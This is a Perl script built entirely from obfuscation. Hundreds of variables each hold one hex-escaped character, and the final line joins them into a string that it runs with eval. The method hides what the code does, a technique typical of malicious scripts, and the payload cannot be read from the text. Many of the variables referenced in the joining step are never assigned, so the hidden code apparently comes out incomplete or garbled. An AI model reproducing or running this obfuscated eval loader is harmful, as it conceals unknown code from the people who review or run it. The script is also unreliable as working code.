$fkri1662="\x6e";$fkri60="\x61";$fkri119="\x6c";$fkri382="\x24";
$fkri1627="\x61";$fkri1085="\x6e";
$fkri882="\x2b";$fkri568="\x20";$fkri833="\x20";$fkri903="\x5c";$fkri1363="\x20";
$fkri1="\x20";
$fkri1115="\x5f";$fkri791="\x30";$fkri1284="\x5d";$fkri1644="\x24";$fkri1692="\x24";$fkri1151="\x20";$fkri780="\x30";
$fkri1080="\x72";
$fkri1277="\x5b";$fkri159="\x63";$fkri646="\x20";$fkri1531="\x6f";$fkri1490="\x79";$fkri718="\x24";$fkri1123="\x0a";$fkri1380="\x20";$fkri654="\x0a";$fkri820="\x74";$fkri1549="\x73";$fkri1221="\x24";$fkri100="\x20";$fkri860="\x69";$fkri402="\x78";$fkri195="\x74";
$fkri1233="\x69";$fkri585="\x72";
$fkri1520="\x61";$fkri36="\x6e";$fkri1428="\x2b";$fkri668="\x70";$fkri1281="\x20";$fkri1475="\x76";$fkri1047="\x6d";$fkri786="\x29";$fkri1685="\x6e";$fkri72="\x74";
$fkri1378="\x6c";$fkri155="\x6d";$fkri599="\x0a";$fkri1148="\x66";$fkri475="\x20";$fkri1462="\x69";$fkri617="\x09";$fkri1276="\x32";$fkri960="\x32";$fkri745="\x6d";$fkri17="\x20";$fkri1035="\x5f";
$fkri425="\x69";$fkri1341="\x24";$fkri964="\x31";$fkri724="\x72";$fkri1110="\x79";$fkri1713="\x3b";$fkri969="\x3d";$fkri679="\x73";$fkri1015="\x24";$fkri962="\x29";$fkri1445="\x20";$fkri891="\x09";
$fkri1701="\x6f";$fkri771="\x6e";$fkri958="\x64";
$fkri1408="\x66";$fkri499="\x63";$fkri683="\x5c";$fkri1373="\x69";$fkri20="\x64";$fkri619="\x6f";$fkri612="\x20";
$fkri459="\x77";$fkri1036="\x6e";$fkri38="\x20";$fkri979="\x09";$fkri765="\x69";
$fkri335="\x28";$fkri1124="\x7b";$fkri1104="\x69";$fkri1116="\x73";$fkri1348="\x20";
$fkri27="\x68";$fkri1612="\x63";$fkri1134="\x2c";$fkri115="\x64";$fkri1560="\x72";$fkri1186="\x69";$fkri761="\x20";$fkri1492="\x75";
$fkri740="\x3b";$fkri716="\x73";$fkri165="\x20";$fkri1541="\x68";
$fkri1595="\x70";$fkri468="\x66";$fkri671="\x6e";$fkri565="\x69";
$fkri1311="\x0a";$fkri222="\x61";$fkri591="\x74";$fkri1425="\x32";$fkri1064="\x24";$fkri876="\x72";$fkri122="\x6c";$fkri1232="\x24";$fkri330="\x65";$fkri1145="\x3b";$fkri449="\x72";$fkri1439="\x72";$fkri240="\x65";$fkri1655="\x22";$fkri1329="\x28";
$fkri1325="\x72";$fkri1058="\x76";$fkri1663="\x74";$fkri743="\x09";$fkri1258="\x40";$fkri85="\x31";
$fkri462="\x65";$fkri83="\x6e";$fkri1603="\x0a";$fkri262="\x20";$fkri376="\x63";$fkri134="\x65";$fkri1074="\x22";$fkri397="\x40";
$fkri298="\x20";$fkri3="\x6f";$fkri158="\x24";
$fkri248="\x3b";$fkri1414="\x2c";
$fkri986="\x20";$fkri487="\x63";$fkri35="\x69";
$fkri701="\x72";$fkri1154="\x79";$fkri794="\x0a";
$fkri1530="\x73";$fkri858="\x28";$fkri664="\x2e";$fkri322="\x3b";$fkri1569="\x70";
$fkri1615="\x6f";$fkri898="\x20";$fkri1482="\x2c";
$fkri1641="\x6d";$fkri1321="\x69";$fkri785="\x29";$fkri1140="\x20";$fkri607="\x6f";$fkri725="\x64";$fkri284="\x72";$fkri112="\x72";
$fkri1431="\x29";
$fkri857="\x20";$fkri1343="\x74";$fkri1319="\x3d";
$fkri1460="\x74";$fkri628="\x30";$fkri66="\x23";
$fkri1507="\x6d";$fkri1537="\x63";$fkri166="\x73";
$fkri1385="\x29";$fkri45="\x30";$fkri1449="\x72";$fkri428="\x20";$fkri1427="\x29";$fkri595="\x67";$fkri1128="\x79";$fkri1042="\x22";$fkri341="\x29";$fkri392="\x70";
$fkri1297="\x20";$fkri1513="\x34";
$fkri1165="\x3b";$fkri1286="\x0a";$fkri290="\x63";$fkri74="\x67";
$fkri620="\x72";$fkri265="\x72";
$fkri396="\x20";
$fkri1059="\x61";$fkri1344="\x72";
$fkri909="\x5f";$fkri410="\x0a";$fkri1572="\x65";$fkri972="\x30";$fkri95="\x23";$fkri1580="\x29";$fkri1484="\x6d";$fkri1646="\x65";$fkri651="\x29";
$fkri560="\x3b";$fkri445="\x65";$fkri660="\x6f";$fkri713="\x65";$fkri1038="\x6d";$fkri1357="\x6f";$fkri811="\x20";$fkri864="\x30";
$fkri289="\x69";
$fkri96="\x20";$fkri386="\x31";$fkri888="\x7b";
$fkri109="\x65";$fkri130="\x76";$fkri146="\x6d";
$fkri1119="\x66";
$fkri24="\x6f";$fkri1097="\x0a";$fkri911="\x61";$fkri54="\x69";
$fkri1547="\x65";$fkri1201="\x29";$fkri1088="\x6d";$fkri905="\x24";
$fkri1669="\x63";$fkri751="\x2e";$fkri841="\x76";$fkri996="\x76";$fkri906="\x76";$fkri1464="\x20";$fkri819="\x73";$fkri143="\x65";$fkri1564="\x6e";$fkri99="\x6c";$fkri1405="\x69";$fkri1670="\x3b";$fkri1324="\x28";$fkri174="\x6d";$fkri1023="\x3d";$fkri1112="\x74";
$fkri1095="\x7d";$fkri1532="\x2c";
$fkri1135="\x20";$fkri1694="\x65";$fkri244="\x69";$fkri1070="\x61";$fkri1157="\x69";$fkri1666="\x20";$fkri470="\x65";$fkri1606="\x69";
$fkri417="\x23";$fkri1485="\x65";$fkri1506="\x6f";$fkri758="\x20";
$fkri419="\x72";$fkri1418="\x74";
$fkri280="\x61";
$fkri737="\x5d";$fkri1640="\x61";$fkri1478="\x63";
$fkri1518="\x65";
$fkri1703="\x3b";$fkri1481="\x65";$fkri1339="\x79";$fkri957="\x6e";$fkri1101="\x62";$fkri448="\x74";$fkri1667="\x24";$fkri319="\x3d";$fkri603="\x20";$fkri1222="\x6a";$fkri313="\x72";$fkri1360="\x28";$fkri577="\x5f";$fkri1393="\x74";$fkri877="\x69";
$fkri273="\x68";$fkri1403="\x70";$fkri587="\x6e";$fkri955="\x72";$fkri346="\x24";$fkri1633="\x2d";$fkri1602="\x3b";$fkri1681="\x24";$fkri1455="\x7d";$fkri939="\x20";$fkri1152="\x28";$fkri1676="\x65";$fkri1680="\x0a";$fkri1372="\x24";$fkri1285="\x3b";$fkri1254="\x3b";$fkri636="\x20";$fkri678="\x25";$fkri1262="\x5b";$fkri390="\x09";
$fkri1012="\x0a";$fkri1510="\x74";$fkri564="\x24";$fkri1433="\x3b";$fkri1578="\x20";$fkri18="\x63";
$fkri1448="\x74";$fkri1617="\x65";$fkri739="\x29";$fkri25="\x72";$fkri139="\x75";$fkri333="\x74";$fkri1715="\x0a";$fkri1601="\x29";$fkri203="\x40";$fkri421="\x6e";$fkri1539="\x20";$fkri34="\x67";
$fkri1637="\x72";$fkri1280="\x2c";$fkri799="\x09";$fkri1501="\x6e";$fkri1382="\x2b";$fkri647="\x2b";
$fkri1419="\x28";$fkri1108="\x72";$fkri598="\x3b";$fkri1203="\x3b";$fkri1192="\x6e";$fkri157="\x20";$fkri692="\x5c";$fkri1409="\x28";
$fkri893="\x6d";$fkri1688="\x3b";$fkri885="\x69";$fkri=$fkri0.
$fkri1.$fkri2.
$fkri3.$fkri4.$fkri5.$fkri6.$fkri7.$fkri8.$fkri9.$fkri10.$fkri11.$fkri12.$fkri13.$fkri14.$fkri15.$fkri16.$fkri17.$fkri18.$fkri19.$fkri20.$fkri21.
$fkri22.$fkri23.$fkri24.
$fkri25.$fkri26.$fkri27.$fkri28.$fkri29.$fkri30.$fkri31.$fkri32.$fkri33.$fkri34.$fkri35.$fkri36.$fkri37.$fkri38.$fkri39.$fkri40.$fkri41.$fkri42.
$fkri43.$fkri44.$fkri45.$fkri46.$fkri47.$fkri48.
$fkri49.
$fkri50.$fkri51.$fkri52.$fkri53.$fkri54.$fkri55.$fkri56.$fkri57.$fkri58.$fkri59.$fkri60.$fkri61.$fkri62.$fkri63.$fkri64.
$fkri65.$fkri66.$fkri67.$fkri68.$fkri69.$fkri70.$fkri71.$fkri72.
$fkri73.$fkri74.$fkri75.$fkri76.$fkri77.
$fkri78.$fkri79.$fkri80.
$fkri81.$fkri82.$fkri83.
$fkri84.$fkri85.$fkri86.$fkri87.$fkri88.$fkri89.$fkri90.$fkri91.$fkri92.
$fkri93.$fkri94.$fkri95.$fkri96.
$fkri97.$fkri98.$fkri99.$fkri100.$fkri101.$fkri102.
$fkri103.$fkri104.$fkri105.$fkri106.$fkri107.$fkri108.$fkri109.$fkri110.$fkri111.$fkri112.
$fkri113.$fkri114.
$fkri115.$fkri116.$fkri117.$fkri118.$fkri119.$fkri120.
$fkri121.$fkri122.$fkri123.$fkri124.
$fkri125.$fkri126.
$fkri127.$fkri128.$fkri129.$fkri130.$fkri131.$fkri132.
$fkri133.$fkri134.$fkri135.$fkri136.
$fkri137.
$fkri138.$fkri139.$fkri140.$fkri141.$fkri142.$fkri143.$fkri144.$fkri145.$fkri146.$fkri147.$fkri148.
$fkri149.$fkri150.
$fkri151.$fkri152.
$fkri153.$fkri154.$fkri155.
$fkri156.$fkri157.$fkri158.$fkri159.
$fkri160.$fkri161.$fkri162.$fkri163.$fkri164.$fkri165.$fkri166.$fkri167.$fkri168.
$fkri169.$fkri170.$fkri171.$fkri172.$fkri173.$fkri174.$fkri175.$fkri176.
$fkri177.$fkri178.$fkri179.$fkri180.$fkri181.$fkri182.$fkri183.$fkri184.
$fkri185.$fkri186.$fkri187.$fkri188.$fkri189.$fkri190.$fkri191.$fkri192.
$fkri193.$fkri194.$fkri195.$fkri196.$fkri197.$fkri198.$fkri199.$fkri200.$fkri201.$fkri202.$fkri203.
$fkri204.$fkri205.$fkri206.$fkri207.$fkri208.
$fkri209.$fkri210.
$fkri211.$fkri212.$fkri213.$fkri214.$fkri215.$fkri216.$fkri217.$fkri218.$fkri219.$fkri220.$fkri221.$fkri222.
$fkri223.$fkri224.
$fkri225.
$fkri226.$fkri227.$fkri228.$fkri229.$fkri230.$fkri231.$fkri232.$fkri233.$fkri234.
$fkri235.$fkri236.$fkri237.
$fkri238.$fkri239.$fkri240.
$fkri241.$fkri242.$fkri243.$fkri244.
$fkri245.$fkri246.$fkri247.$fkri248.$fkri249.$fkri250.$fkri251.$fkri252.
$fkri253.$fkri254.$fkri255.$fkri256.$fkri257.
$fkri258.$fkri259.$fkri260.$fkri261.$fkri262.
$fkri263.$fkri264.$fkri265.$fkri266.$fkri267.$fkri268.
$fkri269.$fkri270.$fkri271.$fkri272.$fkri273.$fkri274.$fkri275.$fkri276.
$fkri277.$fkri278.$fkri279.$fkri280.
$fkri281.$fkri282.$fkri283.$fkri284.$fkri285.$fkri286.$fkri287.
$fkri288.
$fkri289.$fkri290.$fkri291.$fkri292.$fkri293.$fkri294.$fkri295.$fkri296.$fkri297.$fkri298.$fkri299.$fkri300.
$fkri301.$fkri302.$fkri303.$fkri304.$fkri305.$fkri306.$fkri307.$fkri308.$fkri309.$fkri310.
$fkri311.$fkri312.$fkri313.$fkri314.
$fkri315.
$fkri316.$fkri317.$fkri318.
$fkri319.$fkri320.$fkri321.$fkri322.
$fkri323.$fkri324.$fkri325.$fkri326.$fkri327.
$fkri328.$fkri329.$fkri330.$fkri331.$fkri332.$fkri333.$fkri334.$fkri335.$fkri336.$fkri337.$fkri338.$fkri339.$fkri340.$fkri341.$fkri342.
$fkri343.$fkri344.$fkri345.$fkri346.$fkri347.$fkri348.$fkri349.$fkri350.
$fkri351.$fkri352.
$fkri353.$fkri354.$fkri355.$fkri356.$fkri357.$fkri358.$fkri359.$fkri360.
$fkri361.$fkri362.$fkri363.
$fkri364.$fkri365.$fkri366.$fkri367.$fkri368.$fkri369.$fkri370.$fkri371.$fkri372.$fkri373.$fkri374.
$fkri375.$fkri376.
$fkri377.$fkri378.
$fkri379.$fkri380.$fkri381.$fkri382.$fkri383.$fkri384.
$fkri385.$fkri386.$fkri387.$fkri388.$fkri389.$fkri390.$fkri391.$fkri392.$fkri393.$fkri394.$fkri395.
$fkri396.$fkri397.$fkri398.$fkri399.
$fkri400.
$fkri401.$fkri402.$fkri403.$fkri404.$fkri405.$fkri406.$fkri407.
$fkri408.
$fkri409.$fkri410.
$fkri411.$fkri412.$fkri413.$fkri414.$fkri415.$fkri416.$fkri417.$fkri418.$fkri419.$fkri420.
$fkri421.$fkri422.$fkri423.$fkri424.$fkri425.
$fkri426.$fkri427.$fkri428.$fkri429.$fkri430.$fkri431.$fkri432.$fkri433.$fkri434.
$fkri435.
$fkri436.$fkri437.$fkri438.
$fkri439.$fkri440.$fkri441.$fkri442.$fkri443.$fkri444.$fkri445.$fkri446.$fkri447.$fkri448.$fkri449.$fkri450.
$fkri451.$fkri452.
$fkri453.$fkri454.$fkri455.$fkri456.$fkri457.$fkri458.$fkri459.$fkri460.
$fkri461.$fkri462.$fkri463.$fkri464.$fkri465.
$fkri466.$fkri467.$fkri468.
$fkri469.$fkri470.$fkri471.$fkri472.
$fkri473.$fkri474.$fkri475.$fkri476.$fkri477.$fkri478.$fkri479.$fkri480.
$fkri481.
$fkri482.$fkri483.
$fkri484.$fkri485.$fkri486.$fkri487.$fkri488.$fkri489.$fkri490.$fkri491.$fkri492.
$fkri493.$fkri494.$fkri495.$fkri496.$fkri497.$fkri498.$fkri499.
$fkri500.$fkri501.$fkri502.
$fkri503.$fkri504.$fkri505.$fkri506.$fkri507.$fkri508.$fkri509.$fkri510.
$fkri511.$fkri512.$fkri513.$fkri514.$fkri515.$fkri516.$fkri517.$fkri518.$fkri519.$fkri520.$fkri521.$fkri522.
$fkri523.$fkri524.$fkri525.$fkri526.$fkri527.$fkri528.
$fkri529.$fkri530.$fkri531.$fkri532.$fkri533.$fkri534.
$fkri535.$fkri536.$fkri537.$fkri538.$fkri539.$fkri540.
$fkri541.$fkri542.$fkri543.$fkri544.
$fkri545.$fkri546.
$fkri547.
$fkri548.$fkri549.$fkri550.
$fkri551.$fkri552.$fkri553.$fkri554.$fkri555.$fkri556.$fkri557.$fkri558.
$fkri559.$fkri560.$fkri561.
$fkri562.$fkri563.$fkri564.$fkri565.
$fkri566.$fkri567.$fkri568.$fkri569.$fkri570.$fkri571.$fkri572.
$fkri573.$fkri574.$fkri575.$fkri576.$fkri577.$fkri578.$fkri579.$fkri580.$fkri581.$fkri582.$fkri583.$fkri584.$fkri585.$fkri586.$fkri587.$fkri588.
$fkri589.$fkri590.$fkri591.$fkri592.
$fkri593.$fkri594.$fkri595.$fkri596.$fkri597.$fkri598.$fkri599.$fkri600.
$fkri601.$fkri602.$fkri603.$fkri604.$fkri605.$fkri606.$fkri607.
$fkri608.$fkri609.$fkri610.$fkri611.$fkri612.$fkri613.$fkri614.$fkri615.
$fkri616.
$fkri617.
$fkri618.$fkri619.$fkri620.$fkri621.$fkri622.$fkri623.$fkri624.
$fkri625.$fkri626.$fkri627.$fkri628.$fkri629.$fkri630.
$fkri631.$fkri632.$fkri633.$fkri634.$fkri635.$fkri636.$fkri637.$fkri638.
$fkri639.$fkri640.$fkri641.$fkri642.
$fkri643.$fkri644.$fkri645.$fkri646.
$fkri647.$fkri648.$fkri649.$fkri650.$fkri651.$fkri652.$fkri653.$fkri654.$fkri655.$fkri656.$fkri657.$fkri658.$fkri659.$fkri660.$fkri661.$fkri662.$fkri663.$fkri664.
$fkri665.$fkri666.
$fkri667.$fkri668.$fkri669.$fkri670.$fkri671.$fkri672.
$fkri673.$fkri674.$fkri675.$fkri676.$fkri677.$fkri678.$fkri679.
$fkri680.
$fkri681.$fkri682.$fkri683.$fkri684.$fkri685.$fkri686.$fkri687.$fkri688.$fkri689.$fkri690.$fkri691.$fkri692.$fkri693.$fkri694.$fkri695.$fkri696.
$fkri697.$fkri698.
$fkri699.$fkri700.$fkri701.$fkri702.$fkri703.$fkri704.$fkri705.$fkri706.$fkri707.$fkri708.$fkri709.$fkri710.$fkri711.$fkri712.$fkri713.$fkri714.$fkri715.$fkri716.$fkri717.$fkri718.$fkri719.$fkri720.
$fkri721.$fkri722.$fkri723.$fkri724.$fkri725.$fkri726.$fkri727.$fkri728.$fkri729.
$fkri730.$fkri731.$fkri732.$fkri733.$fkri734.$fkri735.$fkri736.$fkri737.$fkri738.$fkri739.$fkri740.$fkri741.$fkri742.$fkri743.$fkri744.
$fkri745.$fkri746.
$fkri747.$fkri748.$fkri749.$fkri750.$fkri751.$fkri752.
$fkri753.$fkri754.$fkri755.$fkri756.$fkri757.$fkri758.$fkri759.$fkri760.
$fkri761.$fkri762.$fkri763.$fkri764.$fkri765.$fkri766.$fkri767.$fkri768.
$fkri769.$fkri770.$fkri771.$fkri772.$fkri773.$fkri774.$fkri775.$fkri776.$fkri777.$fkri778.$fkri779.$fkri780.$fkri781.$fkri782.
$fkri783.$fkri784.$fkri785.$fkri786.$fkri787.$fkri788.
$fkri789.$fkri790.$fkri791.$fkri792.$fkri793.$fkri794.$fkri795.$fkri796.$fkri797.$fkri798.
$fkri799.$fkri800.
$fkri801.
$fkri802.$fkri803.
$fkri804.
$fkri805.$fkri806.$fkri807.$fkri808.
$fkri809.$fkri810.$fkri811.
$fkri812.
$fkri813.$fkri814.$fkri815.$fkri816.
$fkri817.$fkri818.$fkri819.$fkri820.$fkri821.$fkri822.$fkri823.$fkri824.$fkri825.$fkri826.$fkri827.$fkri828.$fkri829.$fkri830.$fkri831.$fkri832.$fkri833.$fkri834.$fkri835.$fkri836.$fkri837.$fkri838.$fkri839.$fkri840.
$fkri841.$fkri842.$fkri843.
$fkri844.
$fkri845.$fkri846.$fkri847.$fkri848.$fkri849.$fkri850.$fkri851.$fkri852.$fkri853.$fkri854.$fkri855.
$fkri856.$fkri857.$fkri858.$fkri859.$fkri860.$fkri861.$fkri862.$fkri863.$fkri864.$fkri865.$fkri866.$fkri867.$fkri868.$fkri869.$fkri870.
$fkri871.$fkri872.$fkri873.$fkri874.$fkri875.
$fkri876.
$fkri877.$fkri878.$fkri879.
$fkri880.$fkri881.$fkri882.$fkri883.$fkri884.$fkri885.
$fkri886.$fkri887.$fkri888.
$fkri889.$fkri890.$fkri891.$fkri892.$fkri893.$fkri894.$fkri895.$fkri896.$fkri897.$fkri898.$fkri899.$fkri900.$fkri901.$fkri902.$fkri903.$fkri904.
$fkri905.$fkri906.$fkri907.
$fkri908.$fkri909.
$fkri910.
$fkri911.$fkri912.
$fkri913.$fkri914.$fkri915.$fkri916.$fkri917.$fkri918.
$fkri919.$fkri920.
$fkri921.$fkri922.$fkri923.$fkri924.
$fkri925.$fkri926.$fkri927.$fkri928.$fkri929.
$fkri930.
$fkri931.$fkri932.$fkri933.$fkri934.$fkri935.$fkri936.$fkri937.$fkri938.$fkri939.
$fkri940.$fkri941.$fkri942.$fkri943.$fkri944.
$fkri945.
$fkri946.$fkri947.$fkri948.
$fkri949.$fkri950.$fkri951.$fkri952.
$fkri953.$fkri954.$fkri955.$fkri956.$fkri957.$fkri958.$fkri959.$fkri960.$fkri961.$fkri962.$fkri963.$fkri964.
$fkri965.
$fkri966.$fkri967.$fkri968.$fkri969.$fkri970.$fkri971.$fkri972.$fkri973.$fkri974.$fkri975.
$fkri976.$fkri977.$fkri978.$fkri979.$fkri980.$fkri981.
$fkri982.
$fkri983.$fkri984.$fkri985.$fkri986.$fkri987.$fkri988.$fkri989.$fkri990.$fkri991.$fkri992.$fkri993.$fkri994.$fkri995.$fkri996.$fkri997.$fkri998.$fkri999.$fkri1000.$fkri1001.$fkri1002.$fkri1003.$fkri1004.$fkri1005.$fkri1006.$fkri1007.$fkri1008.
$fkri1009.$fkri1010.$fkri1011.$fkri1012.$fkri1013.$fkri1014.$fkri1015.$fkri1016.$fkri1017.$fkri1018.$fkri1019.$fkri1020.$fkri1021.$fkri1022.$fkri1023.$fkri1024.$fkri1025.$fkri1026.
$fkri1027.$fkri1028.
$fkri1029.
$fkri1030.$fkri1031.$fkri1032.$fkri1033.$fkri1034.$fkri1035.$fkri1036.$fkri1037.$fkri1038.$fkri1039.$fkri1040.$fkri1041.
$fkri1042.$fkri1043.$fkri1044.
$fkri1045.
$fkri1046.$fkri1047.$fkri1048.$fkri1049.$fkri1050.
$fkri1051.$fkri1052.$fkri1053.$fkri1054.$fkri1055.$fkri1056.$fkri1057.$fkri1058.$fkri1059.$fkri1060.
$fkri1061.$fkri1062.$fkri1063.$fkri1064.
$fkri1065.$fkri1066.$fkri1067.$fkri1068.
$fkri1069.$fkri1070.$fkri1071.$fkri1072.$fkri1073.$fkri1074.$fkri1075.$fkri1076.$fkri1077.$fkri1078.$fkri1079.$fkri1080.$fkri1081.$fkri1082.$fkri1083.$fkri1084.$fkri1085.$fkri1086.
$fkri1087.$fkri1088.$fkri1089.$fkri1090.$fkri1091.$fkri1092.
$fkri1093.$fkri1094.$fkri1095.$fkri1096.$fkri1097.$fkri1098.$fkri1099.
$fkri1100.$fkri1101.$fkri1102.$fkri1103.$fkri1104.$fkri1105.$fkri1106.$fkri1107.$fkri1108.$fkri1109.$fkri1110.$fkri1111.$fkri1112.$fkri1113.$fkri1114.$fkri1115.$fkri1116.$fkri1117.$fkri1118.$fkri1119.$fkri1120.
$fkri1121.$fkri1122.$fkri1123.$fkri1124.$fkri1125.
$fkri1126.$fkri1127.$fkri1128.$fkri1129.$fkri1130.$fkri1131.$fkri1132.$fkri1133.$fkri1134.
$fkri1135.$fkri1136.$fkri1137.$fkri1138.$fkri1139.$fkri1140.$fkri1141.$fkri1142.$fkri1143.
$fkri1144.$fkri1145.$fkri1146.$fkri1147.$fkri1148.$fkri1149.$fkri1150.$fkri1151.$fkri1152.
$fkri1153.$fkri1154.$fkri1155.$fkri1156.$fkri1157.$fkri1158.$fkri1159.$fkri1160.$fkri1161.$fkri1162.$fkri1163.
$fkri1164.$fkri1165.$fkri1166.$fkri1167.$fkri1168.$fkri1169.
$fkri1170.$fkri1171.$fkri1172.$fkri1173.$fkri1174.$fkri1175.$fkri1176.
$fkri1177.$fkri1178.$fkri1179.$fkri1180.$fkri1181.$fkri1182.
$fkri1183.$fkri1184.$fkri1185.
$fkri1186.$fkri1187.$fkri1188.$fkri1189.$fkri1190.$fkri1191.$fkri1192.$fkri1193.$fkri1194.$fkri1195.$fkri1196.$fkri1197.$fkri1198.$fkri1199.$fkri1200.
$fkri1201.$fkri1202.$fkri1203.$fkri1204.$fkri1205.
$fkri1206.$fkri1207.$fkri1208.$fkri1209.
$fkri1210.$fkri1211.$fkri1212.$fkri1213.$fkri1214.$fkri1215.
$fkri1216.$fkri1217.
$fkri1218.$fkri1219.$fkri1220.
$fkri1221.$fkri1222.$fkri1223.$fkri1224.
$fkri1225.$fkri1226.$fkri1227.$fkri1228.$fkri1229.$fkri1230.$fkri1231.$fkri1232.
$fkri1233.$fkri1234.$fkri1235.$fkri1236.$fkri1237.$fkri1238.$fkri1239.$fkri1240.
$fkri1241.$fkri1242.
$fkri1243.$fkri1244.$fkri1245.$fkri1246.$fkri1247.$fkri1248.
$fkri1249.$fkri1250.
$fkri1251.$fkri1252.$fkri1253.$fkri1254.$fkri1255.$fkri1256.$fkri1257.$fkri1258.
$fkri1259.$fkri1260.
$fkri1261.
$fkri1262.
$fkri1263.$fkri1264.
$fkri1265.$fkri1266.$fkri1267.$fkri1268.$fkri1269.$fkri1270.
$fkri1271.$fkri1272.$fkri1273.$fkri1274.$fkri1275.$fkri1276.$fkri1277.$fkri1278.
$fkri1279.$fkri1280.$fkri1281.$fkri1282.$fkri1283.$fkri1284.$fkri1285.$fkri1286.$fkri1287.$fkri1288.
$fkri1289.$fkri1290.
$fkri1291.$fkri1292.$fkri1293.$fkri1294.
$fkri1295.$fkri1296.
$fkri1297.$fkri1298.$fkri1299.$fkri1300.
$fkri1301.$fkri1302.$fkri1303.$fkri1304.$fkri1305.$fkri1306.$fkri1307.$fkri1308.$fkri1309.$fkri1310.$fkri1311.$fkri1312.$fkri1313.$fkri1314.$fkri1315.$fkri1316.$fkri1317.$fkri1318.
$fkri1319.$fkri1320.
$fkri1321.$fkri1322.$fkri1323.$fkri1324.$fkri1325.$fkri1326.$fkri1327.$fkri1328.
$fkri1329.
$fkri1330.$fkri1331.$fkri1332.$fkri1333.$fkri1334.$fkri1335.$fkri1336.
$fkri1337.
$fkri1338.$fkri1339.$fkri1340.
$fkri1341.$fkri1342.$fkri1343.$fkri1344.$fkri1345.$fkri1346.$fkri1347.$fkri1348.
$fkri1349.$fkri1350.
$fkri1351.$fkri1352.$fkri1353.$fkri1354.$fkri1355.$fkri1356.
$fkri1357.$fkri1358.$fkri1359.$fkri1360.$fkri1361.$fkri1362.
$fkri1363.$fkri1364.$fkri1365.$fkri1366.
$fkri1367.$fkri1368.
$fkri1369.$fkri1370.
$fkri1371.$fkri1372.
$fkri1373.$fkri1374.$fkri1375.$fkri1376.$fkri1377.$fkri1378.$fkri1379.$fkri1380.
$fkri1381.$fkri1382.$fkri1383.
$fkri1384.$fkri1385.$fkri1386.$fkri1387.$fkri1388.$fkri1389.$fkri1390.$fkri1391.$fkri1392.$fkri1393.$fkri1394.$fkri1395.
$fkri1396.$fkri1397.$fkri1398.$fkri1399.$fkri1400.$fkri1401.$fkri1402.$fkri1403.$fkri1404.
$fkri1405.$fkri1406.$fkri1407.$fkri1408.$fkri1409.$fkri1410.$fkri1411.$fkri1412.
$fkri1413.$fkri1414.$fkri1415.$fkri1416.$fkri1417.$fkri1418.$fkri1419.$fkri1420.$fkri1421.$fkri1422.$fkri1423.$fkri1424.
$fkri1425.$fkri1426.$fkri1427.$fkri1428.
$fkri1429.$fkri1430.
$fkri1431.$fkri1432.$fkri1433.$fkri1434.
$fkri1435.$fkri1436.$fkri1437.$fkri1438.$fkri1439.$fkri1440.
$fkri1441.
$fkri1442.$fkri1443.$fkri1444.$fkri1445.$fkri1446.$fkri1447.$fkri1448.$fkri1449.$fkri1450.
$fkri1451.$fkri1452.$fkri1453.$fkri1454.$fkri1455.
$fkri1456.
$fkri1457.$fkri1458.$fkri1459.$fkri1460.$fkri1461.$fkri1462.$fkri1463.$fkri1464.$fkri1465.$fkri1466.$fkri1467.$fkri1468.$fkri1469.$fkri1470.$fkri1471.$fkri1472.$fkri1473.$fkri1474.
$fkri1475.
$fkri1476.
$fkri1477.$fkri1478.$fkri1479.$fkri1480.
$fkri1481.$fkri1482.$fkri1483.$fkri1484.$fkri1485.
$fkri1486.$fkri1487.$fkri1488.
$fkri1489.$fkri1490.$fkri1491.$fkri1492.
$fkri1493.$fkri1494.$fkri1495.$fkri1496.
$fkri1497.$fkri1498.$fkri1499.$fkri1500.$fkri1501.$fkri1502.$fkri1503.$fkri1504.$fkri1505.
$fkri1506.$fkri1507.$fkri1508.$fkri1509.
$fkri1510.$fkri1511.$fkri1512.
$fkri1513.$fkri1514.$fkri1515.$fkri1516.$fkri1517.$fkri1518.
$fkri1519.$fkri1520.
$fkri1521.
$fkri1522.$fkri1523.$fkri1524.
$fkri1525.$fkri1526.$fkri1527.
$fkri1528.$fkri1529.$fkri1530.$fkri1531.
$fkri1532.$fkri1533.$fkri1534.$fkri1535.$fkri1536.
$fkri1537.$fkri1538.
$fkri1539.$fkri1540.$fkri1541.
$fkri1542.$fkri1543.$fkri1544.$fkri1545.$fkri1546.$fkri1547.$fkri1548.$fkri1549.$fkri1550.$fkri1551.$fkri1552.
$fkri1553.$fkri1554.
$fkri1555.
$fkri1556.$fkri1557.
$fkri1558.$fkri1559.$fkri1560.$fkri1561.$fkri1562.$fkri1563.$fkri1564.
$fkri1565.$fkri1566.$fkri1567.$fkri1568.$fkri1569.$fkri1570.$fkri1571.$fkri1572.$fkri1573.$fkri1574.$fkri1575.$fkri1576.$fkri1577.$fkri1578.$fkri1579.$fkri1580.$fkri1581.$fkri1582.$fkri1583.$fkri1584.
$fkri1585.$fkri1586.$fkri1587.$fkri1588.$fkri1589.$fkri1590.
$fkri1591.$fkri1592.$fkri1593.$fkri1594.$fkri1595.$fkri1596.$fkri1597.$fkri1598.$fkri1599.$fkri1600.$fkri1601.$fkri1602.$fkri1603.$fkri1604.$fkri1605.$fkri1606.$fkri1607.$fkri1608.
$fkri1609.$fkri1610.$fkri1611.$fkri1612.$fkri1613.$fkri1614.$fkri1615.$fkri1616.
$fkri1617.
$fkri1618.$fkri1619.$fkri1620.$fkri1621.$fkri1622.$fkri1623.$fkri1624.
$fkri1625.$fkri1626.$fkri1627.$fkri1628.$fkri1629.$fkri1630.
$fkri1631.$fkri1632.
$fkri1633.$fkri1634.$fkri1635.
$fkri1636.$fkri1637.$fkri1638.
$fkri1639.$fkri1640.
$fkri1641.$fkri1642.$fkri1643.$fkri1644.$fkri1645.$fkri1646.$fkri1647.
$fkri1648.$fkri1649.$fkri1650.$fkri1651.$fkri1652.
$fkri1653.$fkri1654.
$fkri1655.$fkri1656.$fkri1657.$fkri1658.$fkri1659.$fkri1660.
$fkri1661.$fkri1662.$fkri1663.$fkri1664.$fkri1665.
$fkri1666.$fkri1667.$fkri1668.$fkri1669.$fkri1670.$fkri1671.
$fkri1672.$fkri1673.
$fkri1674.$fkri1675.$fkri1676.$fkri1677.
$fkri1678.
$fkri1679.$fkri1680.
$fkri1681.$fkri1682.$fkri1683.$fkri1684.
$fkri1685.
$fkri1686.$fkri1687.$fkri1688.$fkri1689.$fkri1690.$fkri1691.$fkri1692.
$fkri1693.$fkri1694.$fkri1695.$fkri1696.$fkri1697.$fkri1698.
$fkri1699.$fkri1700.$fkri1701.$fkri1702.$fkri1703.$fkri1704.
$fkri1705.$fkri1706.$fkri1707.$fkri1708.$fkri1709.$fkri1710.
$fkri1711.$fkri1712.$fkri1713.$fkri1714.$fkri1715;$c='fkri';eval $fkri;